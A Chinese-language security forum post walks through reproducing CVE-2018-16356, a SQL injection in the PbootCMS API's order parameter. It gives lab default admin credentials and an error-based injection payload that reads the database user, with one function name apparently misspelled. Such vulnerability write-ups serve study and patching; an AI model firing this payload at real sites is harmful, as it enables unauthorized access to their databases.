安全矩阵

 找回密码
 立即注册
搜索
查看: 1575|回复: 0

pbootcms SQL注入 (CVE-2018-16356)

[复制链接]

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
发表于 2021-10-28 10:40:09 | 显示全部楼层 |阅读模式
pbootcms SQL注入 (CVE-2018-16356)
描述: PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。 PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 后台路径:/admin.php 用户名密码:admin:123456 授权码自行获取:免费获取永久授权码-PbootCMS官网-永久开源免费的PHP企业网站开发建设管理系统

填写到后台"全局配置>>配置参数"中
复现:
$order参数是我们可以控制的

转到函数getList,该参数在函数顺序中使用

再去看function order函数

哦 记得去后台开启APi功能。还要禁用“强制api用户”,打开appid参数
不能不能sql注入
构造payload
/api.php/List/index?order=123 and (updatexm(1,concat(0x7e,(select user())),0))#



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 23:32 , Processed in 0.012073 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表